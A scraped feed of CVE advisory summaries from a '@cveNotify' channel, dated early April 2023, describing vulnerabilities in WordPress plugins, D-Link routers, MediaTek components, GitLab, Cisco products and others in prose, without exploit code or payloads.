🚨 CVE-2023-1920The WP Fastest Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the wpfc_purgecache_varnish_callback function. This makes it possible for unauthenticated attackers to purge the varnish cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-04-06 22:58:33 |
🚨 CVE-2023-1921The WP Fastest Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the wpfc_start_cdn_integration_ajax_request_callback function. This makes it possible for unauthenticated attackers to change cdn settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-04-06 22:58:31 |
🚨 CVE-2023-1922The WP Fastest Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the wpfc_pause_cdn_integration_ajax_request_callback function. This makes it possible for unauthenticated attackers to change cdn settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-04-06 22:58:30 |
🚨 CVE-2023-1923The WP Fastest Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the wpfc_remove_cdn_integration_ajax_request_callback function. This makes it possible for unauthenticated attackers to change cdn settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-04-06 22:58:29 |
🚨 CVE-2023-1924The WP Fastest Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the wpfc_toolbar_save_settings_callback function. This makes it possible for unauthenticated attackers to change cache settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-04-06 22:58:28 |
🚨 CVE-2023-1925The WP Fastest Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the wpfc_clear_cache_of_allsites_callback function. This makes it possible for unauthenticated attackers to clear caches via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-04-06 22:58:24 |
🚨 CVE-2023-1926The WP Fastest Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the deleteCacheToolbar function. This makes it possible for unauthenticated attackers to perform cache deletion via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-04-06 22:58:23 |
🚨 CVE-2023-29014The Goobi viewer is a web application that allows digitised material to be displayed in a web browser. A reflected cross-site scripting vulnerability has been identified in Goobi viewer core prior to version 23.03 when evaluating the LOGID parameter. An attacker could trick a user into following a specially crafted link to a Goobi viewer installation, resulting in the execution of malicious script code in the user's browser. The vulnerability has been fixed in version 23.03.🎖@cveNotify |
|
| 2023-04-06 22:58:22 |
🚨 CVE-2023-29015The Goobi viewer is a web application that allows digitised material to be displayed in a web browser. A cross-site scripting vulnerability has been identified in the user comment feature of Goobi viewer core prior to version 23.03. An attacker could create a specially crafted comment, resulting in the execution of malicious script code in the user's browser when displaying the comment. The vulnerability has been fixed in version 23.03.🎖@cveNotify |
|
| 2023-04-06 22:58:21 |
🚨 CVE-2023-29016The Goobi viewer is a web application that allows digitised material to be displayed in a web browser. A cross-site scripting vulnerability has been identified in Goobi viewer core prior to version 23.03 when using nicknames. An attacker could create a user account and enter malicious scripts into their profile's nickname, resulting in the execution in the user's browser when displaying the nickname on certain pages. The vulnerability has been fixed in version 23.03.🎖@cveNotify |
|
| 2023-04-06 22:58:20 |
🚨 CVE-2023-29017vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules. Prior to version 3.9.15, vm2 was not properly handling host objects passed to `Error.prepareStackTrace` in case of unhandled async errors. A threat actor could bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. This vulnerability was patched in the release of version 3.9.15 of vm2. There are no known workarounds.🎖@cveNotify |
|
| 2023-04-06 22:58:16 |
🚨 CVE-2023-29465SageMath FlintQS 1.0 relies on pathnames under TMPDIR (typically world-writable), which (for example) allows a local user to overwrite files with the privileges of a different user (who is running FlintQS).🎖@cveNotify |
|
| 2023-04-06 22:58:15 |
🚨 CVE-2022-47189Generex UPS CS141 below 2.06 version, allows an attacker toupload a firmware file containing an incorrect configuration, in order to disrupt the normal functionality of the device.🎖@cveNotify |
|
| 2023-04-06 22:58:14 |
🚨 CVE-2022-47190Generex UPS CS141 below 2.06 version, could allow a remote attacker to upload a firmware file containing a webshell that could allow him to execute arbitrary code as root.🎖@cveNotify |
|
| 2023-04-06 22:58:12 |
🚨 CVE-2022-47191Generex UPS CS141 below 2.06 version, could allow a remote attacker to upload a firmware file containing a file with modified permissions, allowing him to escalate privileges.🎖@cveNotify |
|
| 2023-04-06 20:58:35 |
🚨 CVE-2023-20659In wlan, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07588413; Issue ID: ALPS07588413.🎖@cveNotify |
|
| 2023-04-06 20:58:33 |
🚨 CVE-2023-20660In wlan, there is a possible out of bounds read due to an integer overflow. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07588383; Issue ID: ALPS07588383.🎖@cveNotify |
|
| 2023-04-06 20:58:32 |
🚨 CVE-2023-20661In wlan, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07560782; Issue ID: ALPS07560782.🎖@cveNotify |
|
| 2023-04-06 20:58:31 |
🚨 CVE-2023-20662In wlan, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07560765; Issue ID: ALPS07560765.🎖@cveNotify |
|
| 2023-04-06 20:58:30 |
🚨 CVE-2023-20663In wlan, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07560741; Issue ID: ALPS07560741.🎖@cveNotify |
|
| 2023-04-06 20:58:29 |
🚨 CVE-2023-20664In gz, there is a possible double free due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07505952; Issue ID: ALPS07505952.🎖@cveNotify |
|
| 2023-04-06 20:58:28 |
🚨 CVE-2023-20665In ril, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07628604; Issue ID: ALPS07628604.🎖@cveNotify |
|
| 2023-04-06 20:58:27 |
🚨 CVE-2023-20666In display drm, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07310651; Issue ID: ALPS07292173.🎖@cveNotify |
|
| 2023-04-06 20:58:26 |
🚨 CVE-2023-20670In audio, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07648710; Issue ID: ALPS07648710.🎖@cveNotify |
|
| 2023-04-06 20:58:25 |
🚨 CVE-2023-20674In wlan, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07588569; Issue ID: ALPS07588552.🎖@cveNotify |
|
| 2023-04-06 20:58:24 |
🚨 CVE-2023-20675In wlan, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07588569; Issue ID: ALPS07588569.🎖@cveNotify |
|
| 2023-04-06 20:58:23 |
🚨 CVE-2023-20676In wlan, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07588569; Issue ID: ALPS07628518.🎖@cveNotify |
|
| 2023-04-06 20:58:22 |
🚨 CVE-2023-20677In wlan, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07588413; Issue ID: ALPS07588436.🎖@cveNotify |
|
| 2023-04-06 20:58:21 |
🚨 CVE-2023-20679In wlan, there is a possible out of bounds read due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07588413; Issue ID: ALPS07588453.🎖@cveNotify |
|
| 2023-04-06 20:58:20 |
🚨 CVE-2023-20680In adsp, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07664785; Issue ID: ALPS07664785.🎖@cveNotify |
|
| 2023-04-06 20:58:16 |
🚨 CVE-2023-20681In adsp, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07696134; Issue ID: ALPS07696134.🎖@cveNotify |
|
| 2023-04-06 20:58:15 |
🚨 CVE-2023-20682In wlan, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07441605; Issue ID: ALPS07441605.🎖@cveNotify |
|
| 2023-04-06 20:58:14 |
🚨 CVE-2023-20684In vdec, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07671069; Issue ID: ALPS07671069.🎖@cveNotify |
|
| 2023-04-06 20:58:13 |
🚨 CVE-2023-20685In vdec, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07608575; Issue ID: ALPS07608575.🎖@cveNotify |
|
| 2023-04-06 20:58:12 |
🚨 CVE-2023-20686In display drm, there is a possible double free due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07570826; Issue ID: ALPS07570826.🎖@cveNotify |
|
| 2023-04-06 18:58:33 |
🚨 CVE-2023-1755Cross-site Scripting (XSS) - Generic in GitHub repository thorsten/phpmyfaq prior to 3.1.12.🎖@cveNotify |
|
| 2023-04-06 18:58:32 |
🚨 CVE-2023-28733AnyMailing Joomla Plugin is vulnerable to stored cross site scripting (XSS) in templates and emails of AcyMailing, exploitable without authentication when access is granted to the campaign's creation on front-office. This issue affects AnyMailing Joomla Plugin Enterprise in versions below 8.3.0.🎖@cveNotify |
|
| 2023-04-06 18:58:31 |
🚨 CVE-2023-28732Missing access control in AnyMailing Joomla Plugin allows to list and access files containing sensitive information from the plugin itself and access to system files via path traversal, when being granted access to the campaign's creation on front-office. This issue affects AnyMailing Joomla Plugin in versions below 8.3.0.🎖@cveNotify |
|
| 2023-04-06 18:58:30 |
🚨 CVE-2023-28731AnyMailing Joomla Plugin is vulnerable to unauthenticated remote code execution, when being granted access to the campaign's creation on front-office due to unrestricted file upload allowing PHP code to be injected. This issue affects AnyMailing Joomla Plugin Enterprise in versions below 8.3.0.🎖@cveNotify |
|
| 2023-04-06 18:58:29 |
🚨 CVE-2023-1699Rapid7 Nexpose versions 6.6.186 and below suffer from a forced browsing vulnerability. This vulnerability allows an attacker to manipulate URLs to forcefully browse to and access administrative pages. This vulnerability is fixed in version 6.6.187.🎖@cveNotify |
|
| 2023-04-06 18:58:28 |
🚨 CVE-2023-28509Rocket Software UniData versions prior to 8.2.4 build 3003 and UniVerse versions prior to 11.3.5 build 1001 or 12.2.1 build 2002 use weak encryption for packet-level security and passwords transferred on the wire.🎖@cveNotify |
|
| 2023-04-06 18:58:26 |
🚨 CVE-2023-28508Rocket Software UniData versions prior to 8.2.4 build 3003 and UniVerse versions prior to 11.3.5 build 1001 or 12.2.1 build 2002 suffer from a heap-based overflow vulnerability, where certain input can corrupt the heap and crash the forked process.🎖@cveNotify |
|
| 2023-04-06 18:58:25 |
🚨 CVE-2023-28507Rocket Software UniData versions prior to 8.2.4 build 3003 and UniVerse versions prior to 11.3.5 build 1001 or 12.2.1 build 2002 suffer from a memory-exhaustion issue, where a decompression routine will allocate increasing amounts of memory until all system memory is exhausted and the forked process crashes.🎖@cveNotify |
|
| 2023-04-06 18:58:24 |
🚨 CVE-2023-0580Insecure Storage of Sensitive Information vulnerability in ABB My Control System (on-premise) allows an attacker who successfully exploited this vulnerability to gain access to the secure application data or take control of the application. Of the services that make up the My Control System (on-premise) application, the following ones are affected by this vulnerability: User Interface System Monitoring1 Asset Inventory This issue affects My Control System (on-premise): from 5.0;0 through 5.13.🎖@cveNotify |
|
| 2023-04-06 18:58:23 |
🚨 CVE-2023-29008The SvelteKit framework offers developers an option to create simple REST APIs. This is done by defining a `+server.js` file, containing endpoint handlers for different HTTP methods. SvelteKit provides out-of-the-box cross-site request forgery (CSRF) protection to its users. The protection is implemented at `kit/src/runtime/server/respond.js`. While the implementation does a sufficient job of mitigating common CSRF attacks, the protection can be bypassed in versions prior to 1.15.2 by simply specifying an upper-cased `Content-Type` header value. The browser will not send uppercase characters, but this check does not block all expected CORS requests. If abused, this issue will allow malicious requests to be submitted from third-party domains, which can allow execution of operations within the context of the victim's session, and in extreme scenarios can lead to unauthorized access to users’ accounts. This may lead to all POST operations requiring authentication being allowed in the following cases: If the target site sets `SameSite=None` on its auth cookie and the user visits a malicious site in a Chromium-based browser; if the target site doesn't set the `SameSite` attribute explicitly and the user visits a malicious site with Firefox/Safari with tracking protections turned off; and/or if the user is visiting a malicious site with a very outdated browser. SvelteKit 1.15.2 contains a patch for this issue. It is also recommended to explicitly set `SameSite` to a value other than `None` on authentication cookies especially if the upgrade cannot be done in a timely manner.🎖@cveNotify |
|
| 2023-04-06 18:58:22 |
🚨 CVE-2023-29010Budibase is a low code platform for creating internal tools, workflows, and admin panels. Versions prior to 2.4.3 (07 March 2023) are vulnerable to Server-Side Request Forgery. This can lead to an attacker gaining access to a Budibase AWS secret key. Users of Budibase cloud need to take no action. Self-host users who run Budibase on the public internet and are using a cloud provider that allows HTTP access to metadata information should ensure that when they deploy Budibase live, their internal metadata endpoint is not exposed.🎖@cveNotify |
|
| 2023-04-06 18:58:20 |
🚨 CVE-2023-1760Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.12.🎖@cveNotify |
|
| 2023-04-06 18:58:19 |
🚨 CVE-2022-40347SQL Injection vulnerability in Intern Record System version 1.0 in /intern/controller.php in 'phone', 'email', 'deptType' and 'name' parameters, allows attackers to execute arbitrary code and gain sensitive information.🎖@cveNotify |
|
| 2023-04-06 18:58:18 |
🚨 CVE-2022-40032SQL Injection vulnerability in Simple Task Managing System version 1.0 in login.php in 'username' and 'password' parameters, allows attackers to execute arbitrary code and gain sensitive information.🎖@cveNotify |
|
| 2023-04-06 18:58:17 |
🚨 CVE-2023-22629An issue was discovered in TitanFTP through 1.94.1205. The move-file function has a path traversal vulnerability in the newPath parameter. An authenticated attacker can upload any file and then move it anywhere on the server's filesystem.🎖@cveNotify |
|
| 2023-04-06 18:58:16 |
🚨 CVE-2023-0777Authentication Bypass by Primary Weakness in GitHub repository modoboa/modoboa prior to 2.0.4.🎖@cveNotify |
|
| 2023-04-06 18:58:15 |
🚨 CVE-2023-23286Cross Site Scripting (XSS) vulnerability in Provide server 14.4 allows attackers to execute arbitrary code through the server-log via username field from the login form.🎖@cveNotify |
|
| 2023-04-06 18:58:14 |
🚨 CVE-2023-0744Improper Access Control in GitHub repository answerdev/answer prior to 1.0.4.🎖@cveNotify |
|
| 2023-04-06 16:58:18 |
🚨 CVE-2022-43622This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-1935 1.03 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of Login requests to the web management portal. When parsing the HNAP_AUTH header, the process does not properly validate the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-16139.🎖@cveNotify |
|
| 2023-04-06 16:58:14 |
🚨 CVE-2022-43621This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of D-Link DIR-1935 1.03 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of HNAP login requests. The issue results from an incorrectly implemented comparison. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-16152.🎖@cveNotify |
|
| 2023-04-06 16:58:13 |
🚨 CVE-2022-2560This vulnerability allows remote attackers to delete arbitrary files on affected installations of EnterpriseDT CompleteFTP CompleteFTP Server v22.1.0 Server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the HttpFile class. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to delete files in the context of SYSTEM. Was ZDI-CAN-17481.🎖@cveNotify |
|
| 2023-04-06 16:58:12 |
🚨 CVE-2022-43619This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-1935 1.03 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the handling of ConfigFileUpload requests to the web management portal. The issue results from the lack of proper validation of a user-supplied string before using it as a format specifier. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-16141.🎖@cveNotify |
|
| 2023-04-06 16:58:11 |
🚨 CVE-2022-43625This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-1935 1.03 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the handling of SetStaticRouteIPv4Settings requests to the web management portal. When parsing the NetMask element, the process does not properly validate the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-16144.🎖@cveNotify |
|
| 2023-04-06 10:58:18 |
🚨 CVE-2023-29416An issue was discovered in libbzip3.a in bzip3 before 1.3.0. A bz3_decode_block out-of-bounds write can occur with a crafted archive because bzip3 does not follow the required procedure for interacting with libsais.🎖@cveNotify |
|
| 2023-04-06 10:58:15 |
🚨 CVE-2023-29417** DISPUTED ** An issue was discovered in libbzip3.a in bzip3 1.2.2. There is a bz3_decompress out-of-bounds read in certain situations where buffers passed to bzip3 do not contain enough space to be filled with decompressed data. NOTE: the vendor's perspective is that the observed behavior can only occur for a contract violation, and thus the report is invalid.🎖@cveNotify |
|
| 2023-04-06 10:58:14 |
🚨 CVE-2023-29419An issue was discovered in libbzip3.a in bzip3 before 1.2.3. There is a bz3_decode_block out-of-bounds read.🎖@cveNotify |
|
| 2023-04-06 10:58:13 |
🚨 CVE-2023-29421An issue was discovered in libbzip3.a in bzip3 before 1.2.3. There is an out-of-bounds write in bz3_decode_block.🎖@cveNotify |
|
| 2023-04-06 06:58:34 |
🚨 CVE-2023-28879In Artifex Ghostscript through 10.01.0, there is a buffer overflow leading to potential corruption of data internal to the PostScript interpreter, in base/sbcp.c. This affects BCPEncode, BCPDecode, TBCPEncode, and TBCPDecode. If the write buffer is filled to one byte less than full, and one then tries to write an escaped character, two bytes are written.🎖@cveNotify |
|
| 2023-04-06 06:58:33 |
🚨 CVE-2022-31888Session Fixation vulnerability in in function login in class.auth.php in osTicket through 1.16.2.🎖@cveNotify |
|
| 2023-04-06 06:58:32 |
🚨 CVE-2022-31889Cross Site Scripting (XSS) vulnerability in audit/templates/auditlogs.tmpl.php in osTicket osTicket-plugins before commit a7842d494889fd5533d13deb3c6a7789768795ae.🎖@cveNotify |
|
| 2023-04-06 06:58:28 |
🚨 CVE-2022-31890SQL Injection vulnerability in audit/class.audit.php in osTicket osTicket-plugins before commit a7842d494889fd5533d13deb3c6a7789768795ae via the order parameter to the getOrder function.🎖@cveNotify |
|
| 2023-04-06 06:58:27 |
🚨 CVE-2023-0319An issue has been discovered in GitLab affecting all versions starting from 13.6 before 15.8.5, all versions starting from 15.9 before 15.9.4, all versions starting from 15.10 before 15.10.1, allowing to read environment names supposed to be restricted to project memebers only.🎖@cveNotify |
|
| 2023-04-06 06:58:26 |
🚨 CVE-2023-0523An issue has been discovered in GitLab affecting all versions starting from 15.6 before 15.8.5, 15.9 before 15.9.4, and 15.10 before 15.10.1. An XSS was possible via a malicious email address for certain instances.🎖@cveNotify |
|
| 2023-04-06 06:58:25 |
🚨 CVE-2023-0842xml2js version 0.4.23 allows an external attacker to edit or add new properties to an object. This is possible because the application does not properly validate incoming JSON keys, thus allowing the __proto__ property to be edited.🎖@cveNotify |
|
| 2023-04-06 06:58:21 |
🚨 CVE-2023-0959Bhima version 1.27.0 allows a remote attacker to update the privileges of any account registered in the application via a malicious link sent to an administrator. This is possible because the application is vulnerable to CSRF.🎖@cveNotify |
|
| 2023-04-06 06:58:20 |
🚨 CVE-2023-0967Bhima version 1.27.0 allows an attacker authenticated with normal user permissions to view sensitive data of other application users and data that should only be viewed by the administrator. This is possible because the application is vulnerable to IDOR, it does not properly validate user permissions with respect to certain actions the user can perform.🎖@cveNotify |
|
| 2023-04-06 06:58:19 |
🚨 CVE-2023-1582A race problem was found in fs/proc/task_mmu.c in the memory management sub-component in the Linux kernel. This issue may allow a local attacker with user privilege to cause a denial of service.🎖@cveNotify |
|
| 2023-04-06 06:58:15 |
🚨 CVE-2023-1733A denial of service condition exists in the Prometheus server bundled with GitLab affecting all versions from 11.10 to 15.8.5, 15.9 to 15.9.4 and 15.10 to 15.10.1.🎖@cveNotify |
|
| 2023-04-06 06:58:14 |
🚨 CVE-2023-1782HashiCorp Nomad and Nomad Enterprise versions 1.5.0 up to 1.5.2 allow unauthenticated users to bypass intended ACL authorizations for clusters where mTLS is not enabled. This issue is fixed in version 1.5.3.🎖@cveNotify |
|
| 2023-04-06 06:58:13 |
🚨 CVE-2023-24720An arbitrary file upload vulnerability in readium-js v0.32.0 allows attackers to execute arbitrary code via uploading a crafted EPUB file.🎖@cveNotify |
|
| 2023-04-06 06:58:12 |
🚨 CVE-2023-24747Jfinal CMS v5.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /system/dict/list.🎖@cveNotify |
|
| 2023-04-05 22:58:27 |
🚨 CVE-2022-43628This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-1935 1.03 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the handling of SetIPv6FirewallSettings requests to the web management portal. When parsing subelements within the IPv6FirewallRule element, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-16148.🎖@cveNotify |
|
| 2023-04-05 22:58:26 |
🚨 CVE-2022-43632This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-1935 1.03 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the handling of SetQoSSettings requests to the web management portal. When parsing subelements within the QoSInfo element, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-16153.🎖@cveNotify |
|
| 2023-04-05 22:58:25 |
🚨 CVE-2022-43627This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-1935 1.03 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the handling of SetStaticRouteIPv4Settings requests to the web management portal. When parsing subelements within the StaticRouteIPv4Data element, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-16147.🎖@cveNotify |
|
| 2023-04-05 22:58:21 |
🚨 CVE-2022-43631This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-1935 1.03 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the handling of SetVirtualServerSettings requests to the web management portal. When parsing subelements within the VirtualServerInfo element, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-16151.🎖@cveNotify |
|
| 2023-04-05 22:58:20 |
🚨 CVE-2022-36972This vulnerability allows remote attackers to bypass authentication on affected installations of Ivanti Avalanche 6.3.2.3490. The specific flaw exists within the ProfileDaoImpl class. A crafted request can trigger execution of SQL queries composed from a user-supplied string. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-15328.🎖@cveNotify |
|
| 2023-04-05 22:58:19 |
🚨 CVE-2022-37376This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit PDF Editor 11.1.1.53537. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of arrays. By performing actions in JavaScript, an attacker can trigger a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-16599.🎖@cveNotify |
|
| 2023-04-05 22:58:18 |
🚨 CVE-2022-43633This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-1935 1.03 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the handling of SetSysLogSettings requests to the web management portal. When parsing the IPAddress element, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-16154.🎖@cveNotify |
|
| 2023-04-05 22:58:15 |
🚨 CVE-2022-36971This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Avalanche 6.3.2.3490. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the JwtTokenUtility class. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-15301.🎖@cveNotify |
|
| 2023-04-05 22:58:14 |
🚨 CVE-2022-3513An issue has been discovered in GitLab affecting all versions starting from 12.8 before 15.8.5, all versions starting from 15.9 before 15.9.4, all versions starting from 15.10 before 15.10.1. A specially crafted payload could lead to a reflected XSS on the client side which allows attackers to perform arbitrary actions on behalf of victims on self-hosted instances running without strict CSP.🎖@cveNotify |
|
| 2023-04-05 22:58:13 |
🚨 CVE-2023-0319An issue has been discovered in GitLab affecting all versions starting from 13.6 before 15.8.5, all versions starting from 15.9 before 15.9.4, all versions starting from 15.10 before 15.10.1, allowing to read environment names supposed to be restricted to project memebers only.🎖@cveNotify |
|
| 2023-04-05 22:58:12 |
🚨 CVE-2023-0842xml2js version 0.4.23 allows an external attacker to edit or add new properties to an object. This is possible because the application does not properly validate incoming JSON keys, thus allowing the __proto__ property to be edited.🎖@cveNotify |
|
| 2023-04-05 21:58:30 |
🚨 CVE-2023-20152Multiple vulnerabilities in specific Cisco Identity Services Engine (ISE) CLI commands could allow an authenticated, local attacker to perform command injection attacks on the underlying operating system and elevate privileges to root. To exploit these vulnerabilities, an attacker must have valid Administrator privileges on the affected device. These vulnerabilities are due to insufficient validation of user-supplied input. An attacker could exploit these vulnerabilities by submitting a crafted CLI command. A successful exploit could allow the attacker to elevate privileges to root.🎖@cveNotify |
|
| 2023-04-05 21:58:29 |
🚨 CVE-2022-4940The WCFM Membership plugin for WordPress is vulnerable to unauthorized modification and access of data in versions up to, and including, 2.10.0 due to missing capability checks on various AJAX actions. This makes it possible for unauthenticated attackers to perform a wide variety of actions such as modifying membership details, changing renewal information, controlling membership approvals, and more.🎖@cveNotify |
|
| 2023-04-05 21:58:28 |
🚨 CVE-2023-0670Ulearn version a5a7ca20de859051ea0470542844980a66dfc05d allows an attacker with administrator permissions to obtain remote code execution on the server through the image upload functionality. This occurs because the application does not validate that the uploaded image is actually an image.🎖@cveNotify |
|
| 2023-04-05 21:58:24 |
🚨 CVE-2023-1838A use-after-free flaw was found in vhost_net_set_backend in drivers/vhost/net.c in virtio network subcomponent in the Linux kernel due to a double fget. This flaw could allow a local attacker to crash the system, and could even lead to a kernel information leak problem.🎖@cveNotify |
|
| 2023-04-05 21:58:23 |
🚨 CVE-2023-20102A vulnerability in the web-based management interface of Cisco Secure Network Analytics could allow an authenticated, remote attacker to execute arbitrary code on the underlying operating system. This vulnerability is due to insufficient sanitization of user-provided data that is parsed into system memory. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system as the administrator user.🎖@cveNotify |
|
| 2023-04-05 21:58:22 |
🚨 CVE-2023-20103A vulnerability in Cisco Secure Network Analytics could allow an authenticated, remote attacker to execute arbitrary code as a root user on an affected device. This vulnerability is due to insufficient validation of user input to the web interface. An attacker could exploit this vulnerability by uploading a crafted file to an affected device. A successful exploit could allow the attacker to execute code on the affected device. To exploit this vulnerability, an attacker would need to have valid Administrator credentials on the affected device.🎖@cveNotify |
|
| 2023-04-05 21:58:19 |
🚨 CVE-2023-20117Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an authenticated, remote attacker to inject and execute arbitrary commands on the underlying operating system of an affected device. These vulnerabilities are due to insufficient validation of user-supplied input. An attacker could exploit these vulnerabilities by sending malicious input to an affected device. A successful exploit could allow the attacker to execute arbitrary commands as the root user on the underlying Linux operating system of the affected device. To exploit these vulnerabilities, an attacker would need to have valid Administrator credentials on the affected device. Cisco has not released software updates to address these vulnerabilities.🎖@cveNotify |
|
| 2023-04-05 21:58:18 |
🚨 CVE-2023-20122Multiple vulnerabilities in the restricted shell of Cisco Evolved Programmable Network Manager (EPNM), Cisco Identity Services Engine (ISE), and Cisco Prime Infrastructure could allow an authenticated, local attacker to escape the restricted shell and gain root privileges on the underlying operating system. For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2023-04-05 21:58:17 |
